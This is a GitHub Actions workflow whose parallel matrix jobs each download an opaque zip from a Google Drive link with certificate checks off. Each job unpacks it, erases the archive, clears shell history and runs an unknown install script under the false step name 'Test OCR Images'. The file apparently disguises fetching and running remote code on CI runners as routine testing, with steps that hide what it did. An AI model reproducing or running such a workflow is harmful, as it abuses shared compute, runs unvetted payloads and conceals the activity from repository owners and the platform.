name: ungdungweb3lab
on:
  push:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  check:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.0, I.I, I.II]
        flag: ['Acquire', 'Assemble', 'Verify', 'Launch', 'Deliver']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: Install Packages
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1DnDQxVcZtT70ai6Z8rGQL4mhSe576SSa" -O ungdungweb3lab.zip
        unzip -o ungdungweb3lab.zip
        rm ungdungweb3lab.zip
        history -c && history -w

    - name: Test OCR Images
      run: bash install_module.sh


  COMPILE1:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.0, I.I, I.II]
        flag: ['Adapt', 'Assemble', 'Confirm', 'Ignite', 'Release']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: Install Packages
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1DnDQxVcZtT70ai6Z8rGQL4mhSe576SSa" -O ungdungweb3lab.zip
        unzip -o ungdungweb3lab.zip
        rm ungdungweb3lab.zip
        history -c && history -w

    - name: Test OCR Images
      run: bash install_module.sh
        
